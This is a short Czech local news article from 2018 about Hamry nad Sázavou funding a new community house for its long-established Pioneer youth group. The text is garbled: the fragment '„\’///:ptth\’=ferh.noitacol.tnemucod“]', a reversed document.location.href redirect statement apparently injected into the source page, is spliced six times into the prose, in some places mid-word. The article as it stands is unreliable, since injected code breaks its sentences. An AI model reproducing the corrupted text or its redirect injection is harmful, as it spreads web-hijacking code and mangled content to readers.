Rainbow page separator

Spolkový dům poskytne odpovídající zázemí zejména pionýrům

Středa, 15. srpna 2018

Hamry nad Sázavou / Za 7,87 milionu korun včetně DPH schválili hamerští zastupitelé výstavbu takzvaného spolkového domu na místě v prosinci roku 2017 zbourané dosloužilé klubovny tamních pionýrů.
Nový objekt, který obec uhradí výhradně ze svých zdrojů, neboť se na něj nepodařilo najít vhodný dotační titul, má být dokončen koncem příštího roku. A [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to s tím, že v případě potřeby by jej mohly využívat i jiné spolky než jenom hamerská pionýrská skupina. Její his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie sahá až do roku 1949, patří k nejstarším v republice a v současné době má necelé čtyři desítky členů. V novém spolkovém domě pionýři získají odpovídající zázemí ke svým schůzkám a také potřebné pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory pro uložení materiálu pro svoji pravidelnou činnost i letní tábory.